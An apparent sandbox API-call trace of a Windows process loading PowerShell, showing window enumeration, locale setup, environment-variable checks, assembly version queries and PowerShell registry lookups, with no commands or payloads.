	[0710.071] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x128
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x5c8
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6f8
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x358
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x73c
	[0710.072] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb0
	[0710.072] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x250
	[0710.072] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x240
	[0710.072] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x790
	[0710.076] WerSetFlags () returned 0x0
	[0713.050] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0713.050] CoTaskMemFree (pv=0x0) 
	[0713.051] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ade68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ade60 | out: pulNumLanguages=0x1ade68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ade60) returned 1
	[0713.051] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ade68, pwszLanguagesBuffer=0x2d9f300, pcchLanguagesBuffer=0x1ade60 | out: pulNumLanguages=0x1ade68, pwszLanguagesBuffer=0x2d9f300, pcchLanguagesBuffer=0x1ade60) returned 1
	[0713.057] CoTaskMemAlloc (cb=0x24) returned 0x3acec0
	[0713.057] GetUserDefaultLocaleName (in: lpLocaleName=0x3acec0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0713.058] CoTaskMemFree (pv=0x3acec0) 
	[0715.584] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0715.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.584] CoTaskMemFree (pv=0x3096e0) 
	[0715.587] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0715.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.587] CoTaskMemFree (pv=0x3096e0) 
	[0715.589] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0715.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.589] CoTaskMemFree (pv=0x3096e0) 
	[0715.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0715.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0715.599] SetErrorMode (uMode=0x1) returned 0x1
	[0715.599] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1adae0 | out: lpFileInformation=0x1adae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0715.600] SetErrorMode (uMode=0x1) returned 0x1
	[0715.600] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1add50 | out: lpdwHandle=0x1add50) returned 0x94c
	[0715.601] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2da2b90 | out: lpData=0x2da2b90) returned 1
	[0715.602] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adcc8, puLen=0x1adcc0 | out: lplpBuffer=0x1adcc8*=0x2da2c2c, puLen=0x1adcc0) returned 1
	[0715.602] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2d08, puLen=0x1adc30) returned 1
	[0715.602] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0715.603] CoTaskMemAlloc (cb=0x2e) returned 0x3b8580
	[0715.603] lstrcpyW (in: lpString1=0x3b8580, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0715.603] CoTaskMemFree (pv=0x3b8580) 
	[0715.603] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2d5c, puLen=0x1adc30) returned 1
	[0715.603] lstrlenW (lpString="System.Management.Automation") returned 28
	[0715.603] CoTaskMemAlloc (cb=0x3c) returned 0x3b6ce0
	[0715.603] lstrcpyW (in: lpString1=0x3b6ce0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0715.603] CoTaskMemFree (pv=0x3b6ce0) 
	[0715.603] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2db8, puLen=0x1adc30) returned 1
	[0715.603] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0715.603] CoTaskMemAlloc (cb=0x20) returned 0x3b3290
	[0715.603] lstrcpyW (in: lpString1=0x3b3290, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0715.603] CoTaskMemFree (pv=0x3b3290) 
	[0715.603] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2df8, puLen=0x1adc30) returned 1
	[0715.603] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0715.603] CoTaskMemAlloc (cb=0x44) returned 0x3b6ce0
	[0715.603] lstrcpyW (in: lpString1=0x3b6ce0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0715.603] CoTaskMemFree (pv=0x3b6ce0) 
	[0715.603] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2e60, puLen=0x1adc30) returned 1
	[0715.604] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0715.604] CoTaskMemAlloc (cb=0x76) returned 0x34f6e0
	[0715.604] lstrcpyW (in: lpString1=0x34f6e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0715.604] CoTaskMemFree (pv=0x34f6e0) 
	[0715.604] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2efc, puLen=0x1adc30) returned 1
	[0715.604] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0715.604] CoTaskMemAlloc (cb=0x44) returned 0x3b6ce0
	[0715.604] lstrcpyW (in: lpString1=0x3b6ce0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0715.604] CoTaskMemFree (pv=0x3b6ce0) 
	[0715.604] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2f60, puLen=0x1adc30) returned 1
	[0715.604] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0715.604] CoTaskMemAlloc (cb=0x58) returned 0x336ca0
	[0715.604] lstrcpyW (in: lpString1=0x336ca0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0715.604] CoTaskMemFree (pv=0x336ca0) 
	[0715.604] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2fdc, puLen=0x1adc30) returned 1
	[0715.604] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0715.604] CoTaskMemAlloc (cb=0x20) returned 0x3b3290
	[0715.605] lstrcpyW (in: lpString1=0x3b3290, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0715.605] CoTaskMemFree (pv=0x3b3290) 
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x2da2c84, puLen=0x1adc30) returned 1
	[0715.605] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0715.605] CoTaskMemAlloc (cb=0x66) returned 0x3b24d0
	[0715.605] lstrcpyW (in: lpString1=0x3b24d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0715.605] CoTaskMemFree (pv=0x3b24d0) 
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x0, puLen=0x1adc30) returned 0
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x0, puLen=0x1adc30) returned 0
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adc38, puLen=0x1adc30 | out: lplpBuffer=0x1adc38*=0x0, puLen=0x1adc30) returned 0
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adc08, puLen=0x1adc00 | out: lplpBuffer=0x1adc08*=0x2da2c2c, puLen=0x1adc00) returned 1
	[0715.605] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0715.605] VerLanguageNameW (in: wLang=0x0, szLang=0x356120, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0715.605] CoTaskMemFree (pv=0x356120) 
	[0715.605] VerQueryValueW (in: pBlock=0x2da2b90, lpSubBlock="\\", lplpBuffer=0x1adc58, puLen=0x1adc50 | out: lplpBuffer=0x1adc58*=0x2da2bb8, puLen=0x1adc50) returned 1
	[0715.613] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0715.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.613] CoTaskMemFree (pv=0x3096e0) 
	[0715.614] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0715.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.614] CoTaskMemFree (pv=0x3096e0) 
	[0715.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adb28 | out: phkResult=0x1adb28*=0x304) returned 0x0
	[0715.623] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adb18 | out: phkResult=0x1adb18*=0x308) returned 0x0
	[0715.623] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adba8 | out: phkResult=0x1adba8*=0x30c) returned 0x0
	[0717.410] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adaec, lpData=0x0, lpcbData=0x1adae8*=0x0 | out: lpType=0x1adaec*=0x1, lpData=0x0, lpcbData=0x1adae8*=0x56) returned 0x0
	[0717.412] CoTaskMemAlloc (cb=0x5a) returned 0x3b2460
	[0717.412] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adabc, lpData=0x3b2460, lpcbData=0x1adab8*=0x56 | out: lpType=0x1adabc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1adab8*=0x56) returned 0x0
	[0717.412] CoTaskMemFree (pv=0x3b2460) 
	[0717.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0717.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0717.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0717.447] CoTaskMemAlloc (cb=0x104) returned 0x3096e0
	[0717.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3096e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0717.447] CoTaskMemFree (pv=0x3096e0) 
	[0727.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0727.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0731.226] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0731.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.226] CoTaskMemFree (pv=0x3b5040) 
	[0731.228] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0731.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.228] CoTaskMemFree (pv=0x3b5040) 
	[0731.262] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0731.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.262] CoTaskMemFree (pv=0x3b5040) 
	[0731.263] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0731.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.263] CoTaskMemFree (pv=0x3b5040) 
	[0731.263] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0731.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.263] CoTaskMemFree (pv=0x3b5040) 
	[0737.194] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0737.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.194] CoTaskMemFree (pv=0x3b5040) 
	[0737.198] CoTaskMemAlloc (cb=0x104) returned 0x3b5040
	[0737.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.198] CoTaskMemFree (pv=0x3b5040) 
	[0738.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0738.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0745.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0747.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0747.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0751.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0754.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0754.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0756.347] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0756.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.347] CoTaskMemFree (pv=0x3cba10) 
	[0756.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0756.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0756.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0757.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0757.765] SetErrorMode (uMode=0x1) returned 0x1
	[0757.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ada80 | out: lpFileInformation=0x1ada80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0757.765] SetErrorMode (uMode=0x1) returned 0x1
	[0765.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.293] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
